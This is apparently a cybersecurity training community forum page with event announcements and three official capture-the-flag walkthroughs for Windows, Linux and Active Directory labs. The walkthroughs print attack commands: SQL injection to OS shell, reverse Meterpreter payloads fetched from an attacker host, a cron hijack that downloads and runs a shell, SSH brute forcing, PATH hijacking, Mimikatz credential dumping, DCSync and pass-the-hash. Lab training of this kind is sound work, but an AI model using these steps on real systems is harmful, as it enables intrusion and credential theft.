community challenge
21 Topics

The Human Connection Challenge Lab 1: Basic OS Skills – Walkthrough Guide (Community Version)
This is a walkthrough guide written by one of our community members, who offered to give their perspective on the challenge. Interestingly, they approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line.
970 Views, 2 likes, 2 Comments

October is here! Prepare for Cybersecurity Awareness Month with Immersive 🎃
In a world where technology and threats are constantly evolving, building a resilient team is more important than ever. At Immersive, we're proud to be your partner in this journey, and we've put together a fantastic lineup of events, challenges, and resources throughout October to help you and your teams stay ahead of the curve.

What’s on at Immersive this Cybersecurity Awareness Month 📆
Oct 1st - Whitepaper: GenAI’s Impact on Cybersecurity Skills and Training
Oct 6th - Trick or Treat on Specter Street Challenge Begins: Labs 1-3
Oct 9th - Labs Live: Ripper's Riddle Community Webinar
Oct 13th - Trick or Treat on Specter Street Challenge: Labs 4-6
Oct 15th - Webinar: How to Build a People-Centric Defense for AI-Driven Attacks
Oct 16th - Labs Live: Cursed Canvas Community Webinar
Oct 20th - Trick or Treat on Specter Street Challenge: Labs 7-9
Oct 22nd - Cyber Resilience Customer Awards Winners Revealed
Oct 23rd - Labs Live: Macro Polo Community Webinar
Oct 27th - Trick or Treat on Specter Street Challenge: Labs 10-12
Oct 30th - Labs Live: Phantom Pages Webinar
Oct 31st - Trick or Treat on Specter Street Challenge Finale: Labs 13
Oct 31st - Virtual Crisis Sim: The Puppet Master’s Trick or Treat

Challenges and Labs

Trick or Treat on Specter Street 👻
Welcome to Trick or Treat on Specter Street, a Halloween-themed cybersecurity challenge where you'll use both offensive and defensive skills to solve a mystery unlike anything we’ve encountered before. Each week throughout October, we’ll drop new hands-on labs that slowly begin to uncover the secrets of Specter Street. Can you crack the case? Find out more.

AI Foundations 🤖
Ready to navigate the rapidly evolving world of Artificial Intelligence with confidence? Give our new AI Foundations lab collection a go! Designed to equip your teams with critical AI knowledge and practical implementation skills, this initial collection features seven foundational labs that progressively guide your teams from high-level overviews to secure, hands-on AI implementation. Find out more.

Events and Webinars

Webinar: How to Build a People-Centric Defense for AI-Driven Attacks
Wednesday October 15th
A must-attend event for understanding how threat actors are leveraging AI and other emerging technologies to carry out attacks. Register Now.

Virtual Crisis Sim: The Puppet Master’s Trick or Treat
Friday October 31st
Join us on Halloween as the notorious Puppet Master returns for a fiendish game of Trick or Treat 🎃 Play along with our Immersive crisis response experts as we tackle a LIVE coordinated attack from the Puppet Master on a Critical National Infrastructure organization. Dare you play the Puppet Master’s game and survive, or will they finally get their revenge?! Register Now.

AI and Emerging Threats
Throughout the month, we’re shining a spotlight on the rise of AI in cyber. From our all-new AI Foundational lab series to cutting edge research from the experts at the cutting edge of GenAI in cybersecurity in our latest whitepaper: GenAI’s Impact on Cybersecurity Skills and Training. Explore our latest AI-focused resources and upskill your teams to confidently face the future of cyber resilience. Check out our latest reports, articles, webinars and more on GenAI, here.

Celebrating Cyber Resilience Heroes 🏆
We're also celebrating the individuals and organizations at the forefront of cyber resilience with our Cyber Resilience Customer Awards. Keep your eyes peeled on our social channels! We'll be unveiling our latest winners on October 22nd, recognizing those who demonstrate an outstanding commitment to proving and improving their cyber readiness.

It's going to be a jam-packed month focused on practical application and deep engagement. Let’s make this the most secure October yet!
123 Views, 1 like, 1 Comment

Enter The Maze Challenge: Immersive’s Most Advanced Collection Yet
Today marks the release of the Maze Challenge, Immersive’s most advanced and cunningly designed offensive cybersecurity collection yet. This new series of labs is more than just a test of skills. It's a puzzle, a game, and a creative brain-bender, crafted by two of Immersive’s most brilliant minds: StefanApostol and SabrinaKayaci.

Stefan, known to many as the "evil genius" behind the Human Connection Challenge, and Sabrina, who recently inspired our London community meetup attendees with her predictions on AI within the AppSec space, have teamed up to create something truly unique. We sat down with them to get their insights on what makes the Maze Challenge so special, so challenging, and so much fun.

What was the main inspiration behind the maze theme, and how did you translate that narrative into a collection of technical labs?

The core idea for the Maze Challenge, as Stefan explained, came from a shared love of games. "Both Sabrina and I are geeks. We like games, and we wanted to create a challenge with an overarching goal that was more than about earning a completion token." While our labs have always awarded tokens for completion, Stefan and Sabrina wanted to create a narrative that would engage users on a deeper level. "A maze is the perfect example of that," Stefan said. "We wanted to include a game element in these challenges."

This isn't just a series of technical scenarios. It's a cohesive puzzle where each lab is a step toward a larger objective. The maze narrative encourages participants to think creatively, connecting different skills and techniques in a way that feels more like a game than a traditional capture the flag (CTF).

I’ve heard that this is the most advanced lab collection yet. So, what makes these labs more challenging than the thousands of others in Immersive's catalogue?

This collection is Immersive's most advanced to date, introducing a range of techniques not yet widely covered in the platform. The labs are a combination of real-world examples drawn from the creators' past experiences and internal testing, all woven together with a good deal of imagination.

While the challenge covers a broad spectrum of offensive skills, including web, Linux, Windows, and Active Directory, Stefan was quick to name binary exploitation as an obvious concept that will have participants scratching their heads. The team collaborated with BenMcCarthy on this particular lab, and Ben being Ben, he poured all his creativity into it, making even Stefan nervous to attempt this mean challenge!

Sabrina added that the real difficulty lies in the type of thinking required. "Some of them will really require outside-the-box thinking," she said. "They're unusual in a way that requires not just the technical skill, but some creativity and more critical thinking." This is a key theme throughout the collection. Participants can't rely on a simple, formulaic approach. Instead, they must be flexible and resourceful. Sabrina noted that some challenges will require "multiple sets of skills," forcing users to chain together their expertise in different areas to find a solution.

Without giving away any spoilers, can you describe a moment in one of the labs that you're particularly proud of designing?

Sabrina beamed as she recalled the Inner Maze lab. "I really enjoyed creating Inner Maze," she said, before adding a cryptic twist. "When you break out of that maze is when you're really trapped." She was particularly proud of her ability to create and then beat her own challenge, finding the exploit even more difficult than the design itself.

Can you give users any hints or tips?

The Maze Challenge is designed to be tough, and you should certainly expect it to be just that. However, the creators want everyone to have a fair shot, so they’ve some advice for those who might feel intimidated.

Use the platform to your advantage. Stefan noted that around 98% of concepts within this challenge can be learned in the rest of our lab catalogue. "If you get stuck on a specific skill, take a break from the maze, find the relevant labs on the platform, and then come back with your newfound knowledge." We encourage you to learn along the way, and persistence is always rewarded!

Failure can be a sign of progress. Sabrina shared a key insight: "Sometimes it's important to take note of what it is you're doing that's failing... If you're failing at the same spot in a particular approach, that could actually mean that you're doing something right." Go figure that one out!

Don't go it alone. Sabrina advises anyone starting their journey to ask others for advice and help. Our community help forum is a great resource for sharing knowledge and getting tips from fellow participants. We want you to have fun, and part of that fun is collaborating with your industry peers along the way.

In the end, what do you hope participants will take away from this experience, beyond the technical skills?

Stefan and Sabrina both hope it's a "desire for more challenges"! They also dropped a teaser for a community Halloween challenge… That’s all you’re getting for now! 👀

Want a head start?

Join Stefan and Sabrina for a Labs Live webinar on August 19th. They’ll be solving the Improbable Maze lab live on the call, in collaboration with you. Attendees are encouraged to play along, offer their suggestions, methods, and frustrations. It’s the perfect opportunity to see the creators’ thought process and gain some momentum for your own journey through the maze. See you there!
143 Views, 2 likes, 5 Comments

Labs Live Special: The Human Connection Season Finale
Join us for a special Labs Live event celebrating the conclusion of The Human Connection Challenge: Season 1! As we wrap up this highly anticipated challenge, we're hosting a live webinar featuring the one and only Stefan Apostol, the "evil genius" and author behind the labs!

The Human Connection Challenge: Season 1 tasked cyber professionals like you with tackling 7 never-before-seen labs covering a range of critical offensive security topics, from Basic OS Skills to Active Directory. It's been an epic season of skill-polishing, resilience-building, and demonstrating expertise within the community.

In this session, Stefan will leverage the interactive Labs Live format for episode 7: Active Directory. He'll share his techniques, explain the intended solutions, and answer your burning questions live. Whether you crushed all 7 labs, or tried a couple, this is a unique opportunity to learn directly from the source.

Haven't completed the labs yet? There's still time to be a Season 1 Winner!

Complete one or more of the seven challenge labs in The Human Connection Challenge: Season 1 collection before the deadline of Monday, 2nd June 2025, to be entered into our exclusive Season Finale Prize Draw. Every lab you complete gives you one entry, so completing all seven gives you seven chances to win incredible prizes. More details here.
774 Views, 5 likes, 1 Comment

Community Challenge Season 1 Winners
From November to May we released monthly lab challenges and awarded limited edition challenge coins to the members who were:
🥇 First to Finish
⏱️ Fastest to Complete
🎯 Most Accurate
💪 Most Persistent

Don't worry if you didn't take part, the labs are still available, with walkthrough guides available if you get stuck.

To celebrate the 7th and final lab of the season we raised the stakes, with prizes available to anyone who completed 1 or more challenge lab before the deadline:
🥇 Tickets, Flights & Accommodation to an Immersive Summit in NYC or London
🥈 2 x PlayStation®5 Consoles
🥉 10 x Apple AirPods or JBL Headphones

Not all of our winners can be named, but I am happy to share the details of some of the winners:
🥇 Muhammed Sajid - QIIB
🥉 Akram Diri - SF Group
🥉 Michal Zywczak - HSBC
🥉 Audey Isaacs - Commonwealth Bank of Australia
🥉 Juan Calderon-Martinez - Siemens

Don't be disheartened if you didn't win this time - some a-maze-ing new challenges are coming very soon...
96 Views, 1 like, 2 Comments

The Human Connection Challenge Lab 5: Windows Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 5: Windows from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started.

Overview

This challenge isn’t linear, meaning you can start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!). I’ll simply talk through the technique that helped escalate privileges.

Target 1

As always, when you don’t know anything about a target machine, you Nmap first.

    nmap -Pn -sVTC -p- <Target 1 IP>

Here’s a breakdown of the flags used in this command:
    -Pn: Skip ping scanning
    -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts
    -p-: All ports (1-65535)

Nmap reports that it got a 401 Unauthorized when doing an HTTP GET on port 80 but didn’t get the WWW-Authenticate header. This is not something you generally see because these two usually go hand in hand.

Visiting the page confirms the 401 Unauthorized. However, checking the source code reveals the credentials IMLUser:hidd3n. These credentials won’t work for remote desktop protocol (RDP), but they will give you access to server message block (SMB). They’ll also give you access to C. C$ is a hidden share that requires administrator access, but C is a normal share and can be accessed by this user.

Listing the Windows directory, the to-backup folder stands out, as it’s the only non-default folder. Browsing it reveals backups of SAM, SYSTEM, and SECURITY hives. These can be transferred offline and reconstructed to obtain local user hashes.

    get SAM.backup
    get SECURITY.backup
    get SYSTEM.backup
    impacket-secretsdump -sam SAM.backup -security SECURITY.backup -system SYSTEM.backup

You can now either pass the hash and log in as administrator, or try to crack it. Both are valid methods, but this is the way to crack it:

    echo <Administrator Line> > hash
    john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

And you’ll get the credentials Administrator:blink182. Now you can log in over RDP and get your first token!

    xfreerdp /v:<Target 1 IP> /u:Administrator /dynamic-resolution +clipboard

Target 2

Initial access

Nmapping the second target reveals a website titled “Password Manager”.

    nmap -Pn -sVTC -p- <Target 2 IP>

Upon visiting the website, you’ll see its URL is 10.102.38.73. It asks the user to choose a game from a drop-down box and submit their choice. Once a game is selected (such as World of Warcraft), it adds a parameter to the URL, which then becomes http://10.102.38.73/?game=WOW.

You can scan this with SQLMap using the following command:

    sqlmap -u http://<Target 2 IP>/?game=*

This will confirm that the target is vulnerable to SQL injection, so you can use the following command to gain code execution on the target host:

    sqlmap -u http://<Target 2 IP>/?game=* --os-shell

With the ability to execute commands on the target system, you can now read the token.

Privilege escalation

Since the previous shell is limited, you can upload and execute a reverse Meterpreter shell to use all its privilege escalation functions. First, create the Meterpreter shell and serve it over HTTP using Python.

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f exe > shell.exe
    sudo python -m http.server 80

In a different terminal, run your Metasploit listener.

    sudo msfconsole
    use multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost <Kali IP>
    set lport 443
    exploit

Finally, in your SQLMap’s OS shell, run the following commands to download and trigger your payload:

    powershell wget http://<Kali IP>/shell.exe -o C:\users\iis-admin\shell.exe
    C:\users\iis-admin\shell.exe

Once you hit enter a second time you’ll get a connection back to your listener.

Metasploit has a variety of post-exploitation modules you can try, but the one that will work is exploit/windows/local/service_permissions. Of course, you can do this with PowerUp or any other privilege escalation tool of your choice, but Metasploit just automates the exploitation process better in this case.

    use exploit/windows/local/service_permissions
    set session 1
    exploit

The module will first enumerate all local service permissions. Once it finds one that runs under a higher privilege user and it can modify, it automatically exploits this service and starts a new Metasploit session under this new user. You’ll then find the token on the desktop.

Target 3

Initial access

Nmapping the second target reveals only two running services, SMB and RDP.

    nmap -Pn -sVTC -p- <Target 3 IP>

Enumerating the SMB service reveals that guest access is enabled. The listing also shows a share called Shared.

    smbclient -L \\\\<Target 3 IP> -U guest
    smbclient \\\\<Target 3 IP>\\Shared -U guest

You should soon reach the file reply.txt, which contains the password for the user IMLUser. With your newly found credentials (IMLUser:Shar3dPass), you can now RDP into the target.

    xfreerdp /v:<Target 3 IP> /u:IMLUser /p:Shar3dPass /dynamic-resolution

You’ll find the first token in a file on the Desktop.

Privilege escalation

This privilege escalation technique is a rather classic one. After local file enumeration, you can find the Administrator password in C:\Windows\Panther\Unattend.xml and use it to run CMD as administrator and find the final token.

Tools

For this challenge, you’ll use a range of tools including:
    Nmap
    Metasploit
    Python
    SQLMap
    smbclient

Tips

When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application.

To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit SQL Injection

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!
886 Views, 2 likes, 8 Comments

The Human Connection Challenge Lab 4: Linux Official Walkthrough Guide
Time’s Up! Congratulations to everyone who completed Lab 4: Linux from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

Throughout this walkthrough, placeholders will be used for target IPs in brackets, such as <Kali IP> or <Target IP>. Simply replace this with the actual IP of your Kali instance or the specific target. With all that considered, let's get started.

Overview

This challenge is in no way linear and you could start with any of the targets listed in the Machines panel. This walkthrough will attack them in order, but it’s up to you which one you try first! For privilege escalation techniques, I won’t go through each enumeration step (to keep this walkthrough from being 70 pages long!). I’ll simply talk through the technique that helped escalate privileges.

Target 1

First things first, as with any pen test, Nmap!

    nmap -Pn -sVTC -p- <Target 1 IP>

Here’s a breakdown of the flags used in this command:
    -Pn: Skip ping scanning
    -sVTC: Service (V)ersioning, (T)CP scanning, Default S(C)ripts
    -p-: All ports (1-65535)

Scanning all ports reveals that a Redis server is running version 4.0.1 on the target host. Since you have a version number, the next step is to identify any public exploits you could use. A quick Google search for the version reveals there is a Metasploit module available for this.

First, fire up Metasploit as root with:

    sudo msfconsole

Then, set all the necessary parameters needed for the exploit:

    set srvhost <Kali IP>
    set lhost <Kali IP>
    set rhosts <Target 1 IP>

Then simply run the module. Since the module was successful, you’ll get a connection back to your Kali machine’s listener. Dropping into a shell reveals that you are root, and you can read the token to complete the first Target.

Target 2

Initial access

Back to square one. Since you don’t know anything about the second target, you must Nmap it and see what services it’s running.

    nmap -Pn -sVTC -p- <Target 2 IP>

Since the only running service is SSH and the version doesn’t look like it would be vulnerable to any known exploits, you can attempt to connect to it and hope to gather more information.

    ssh <Target 2 IP>

The SSH banner mentions the system is “reserved for john and friends”. Even though you aren’t friends with john, you now know that “john” is a valid system user so you can attempt a dictionary attack against this user.

    hydra -l john -P /usr/share/wordlists/metasploit/burnett_top_500.txt ssh://<Target 2 IP>

The dictionary attack will reveal a valid password, trustno1. You can now use this password to log in as john over SSH and get the low-level token.

    ssh john@<Target 2 IP>

Privilege escalation

Now that you have access to the target, you can attempt to escalate your privileges. One of the methods is to find SUID binaries owned by root. These are binaries that can be executed with the privileges of their owner. If you can find one that uses another binary from the $PATH variable, you could exploit this behavior to escalate your privileges.

    find /usr/local/bin -perm -4000

Checking for SUID binaries reveals /usr/local/bin/ls-lh. After dumping the strings of this binary, you can see that it uses ls from $PATH. This is extremely dangerous, as any user could escalate privileges by creating a binary called ls, adding it to a writable directory, and exporting their PATH to first contain this directory before anything else. And that’s precisely what you’ll do to exploit this!

First, create a file in /tmp called ls.c.

    touch /tmp/ls.c

Then, add the following code that will spawn bash when run:

    #include <stdlib.h>
    int main(){
        system("/bin/bash");
    }

Finally, compile this to /tmp/ls, add /tmp as the first location of the PATH variable, and run the original SUID binary.

    gcc -o /tmp/ls /tmp/ls.c
    export PATH=/tmp:$PATH
    ls-lh /root

Target 3

Initial access

Again, start with an Nmap scan to see what services are running on the target host.

    nmap -Pn -sVTC -p- <Target 3 IP>

You can see from the output that the target is running an Apache webserver titled anna’s website. You can extend your Nmap command to run all HTTP scripts that don’t attempt brute forcing or DoS-ing against the target and try to uncover more information.

    nmap -Pn -sVTC --script="http* and not(brute or dos)" <Target 3 IP>

This reveals that the target is running webdav. However, the status code returned is 401, which means you need valid credentials to access this. You know the username is anna, you just need to find the password.

    hydra -l anna -P /usr/share/wordlists/metasploit/burnett_top_500.txt -f <Target 3 IP> http-get /webdav

This command reveals the password 123456. Unfortunately, your Kali instance doesn’t have a webdav client such as cadaver, but creativity is part of a pen tester’s job! Instead, use Metasploit’s windows/http/xampp_webdav_upload_php to get a reverse shell. Even though the target is Linux, this will still work because it uploads PHP. However, while the exploit is running, you must access the uploaded file manually to trigger it.

    use windows/http/xampp_webdav_upload_php
    set rhosts <Target 3 IP>
    set filename shell.php
    set username anna
    set password 123456
    exploit

Once the exploit module is triggered, you can access the uploaded file from a different terminal:

    wget http://anna:123456@<Target 3 IP>/webdav/shell.php

And, of course, this triggers the reverse shell and you get a connection back to your Metasploit listener.

Privilege escalation

Checking crontab, you can see there is a recurring job run by root that clears webdav. The permissions on this file allow it to be modified by anyone. At this point, you could, in theory, just make it read the root token into a world-readable file and finish the challenge. But did you really hack it if you don’t have interactive access?

First, generate a reverse shell using msfvenom:

    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f elf > shell.elf

Then, serve it using Python:

    sudo python -m http.server 80

Then, set up your Metasploit listener (since the port is 443, remember to run Metasploit as root):

    use multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    set lport 443
    set lhost <Kali IP>
    exploit

And finally, you can modify the file run by the cron job to trigger your exploit.

    echo "wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf" > /tmp/clear-dav.sh

Once the job is triggered, it first downloads the file from your HTTP server. Then, you get a connection back to your Metasploit listener.

Tools

For this challenge, you’ll use a range of tools including:
    Nmap
    Metasploit
    Python
    GCC
    Hydra

Tips

When testing for vulnerabilities, remember that vulnerabilities may reside in any part of the target infrastructure. Subtle elements that appear unimportant could prove exploitable. So make sure you leave no stone unturned and check every single aspect of the target server.

To learn more about some of the tools used in this lab, take a look at the following collections: Moving Around Secure Testing: Beginner Credential Access Privilege Escalation: Linux Introduction to Metasploit

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge and are looking forward to the next one, after which I’ll share another walkthrough guide!
1.6K Views, 1 like, 33 Comments

Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine!

This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed.

This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started!

Task 1

What is the WS01 token in C:\Users\Administrator\Desktop\token.txt?

The credentials panel gives you the following username and password combination for host WS01.

    offensive\jack.s:!nitialPass33.

Use the following command to log in to WS01:

    xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution

The task asks you for the token in C:\users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-level user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools. Run all privilege escalation checks with the following command:

    SharpUp audit

This gives you the credentials OffensiveAdmin:It’sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin:

    xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution

With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt.

Task 2

What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt?

It’s clear from the task that we must get access to user tina.m who can connect to SRV01. With your new administrator privileges on WS01, open a task manager to check for possible user sessions. You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz.

    mimikatz.exe
    privilege::debug
    sekurlsa::logonpasswords

Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token.

Task 3

What is the DC token in C:\Users\Administrator\Desktop\token.txt?

The last task asks you to connect to the DC, which means you need to become a domain administrator. Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them would be unconstrained delegation.

    . .\PowerView-Dev.ps1
    Get-DomainComputer -Unconstrained -Properties dnshostname

It seems like SRV01 is trusted for unconstrained delegation. Since you have administrator privileges, you can obtain DC01’s ticket-granting ticket (TGT). First, transfer Rubeus.exe and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets.

    Rubeus.exe monitor /interval:1

Then, force DC01 to make an SMB connection to SRV01 to grab the ticket.

    .\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local
    sed -i "s/ //g" ticket.txt
    tr -d "\n" < ticket.txt

Then, on SRV01, run the following command to pass it.

    Rubeus.exe ptt /ticket:<formatted base64 encoded ticket>

If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$. Now, transfer mimikatz.exe and run the following command:

    mimikatz.exe
    lsadump::dcsync /user:administrator

This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows:

    sudo msfconsole
    use exploit/windows/smb/psexec
    set smbuser administrator
    set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334
    set rhosts <DC IP>
    exploit

Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt.

Tools

For this challenge, you’ll use a range of tools including:
    SharpUp
    PowerView
    Rubeus
    MS-RPRN
    Metasploit

Tips

When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application.

To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit Introduction to Active Directory Attacks Kerberos

Conclusion

The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below!

I hope you enjoyed the challenge!
605 Views, 5 likes, 9 Comments

The Human Connection Challenge Season 1 Finale is Here!
Since November we’ve been dropping monthly community lab challenges and awarding limited edition challenge coins to the members who were:
🥇 First to Finish
⏱️ Fastest to Complete
🎯 Most Accurate
💪 Most Persistent

However, all good things must come to an end, and so this month’s challenge will be the last of Season 1. But please don’t fret! To celebrate this occasion we have some awesome prizes up for grabs for anyone who completes a challenge lab before the 2nd June:
🥇 Tickets, Flights & Accommodation to an Immersive Summit in NYC or London
🥈 2 x PlayStation®5 Consoles
🥉 10 x Apple AirPods or JBL Headphones
👕 Much coveted Immersive swag and goodies!

You can read all about the competition (including full terms and conditions) here.

Ready to level up your cybersecurity skills and win some cool stuff? Dive into The Human Connection Challenge: Season 1 collection to get started!
580 Views, 1 like, 10 Comments

Cyber Countdown: Day 1
Lab of the Day

Every day we’re revisiting a standout lab from the past year—highlighting its impact and the skills it helped build, whilst also introducing you to the experts who built it.

To get us started, today’s lab is of course Episode 2 of our Community Challenge - Scanning. In this lab we’ll test your scanning and enumeration skills but other than that, you’ll find limited information available to guide you.

Lab author BethHolden, Cyber Security Engineer here at Immersive Labs is passionate about offensive cybersecurity and created this challenge as a little Christmas treat. The lab contains a range of tools which may provide multiple ways to solve the challenge, she’s eager to see how well you fare – good luck!

As a reminder, we reward the top performing community members in the following categories:
🥇 First to Finish
⏱️ Fastest to Complete
🎯 Most Accurate
💪 Most Persistent
🎁 Spot Prizes

In addition, at the end of each month, the lab author will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach similar labs in the future. We also encourage you to submit your own walkthrough guides to community@immersivelabs.com and we will feature any unique approaches in their own Community Walkthrough Guide.

You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 22nd December 2024 to complete episode 2!

To find the lab in the Immersive Labs Platform, click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Scanning

🔔 Don’t miss out – there are 5 more labs to come in this challenge series. Make sure you're following the CHALLENGES Tag to get notified as soon as each one is released. Good Luck!
1.1K Views, 4 likes, 25 Comments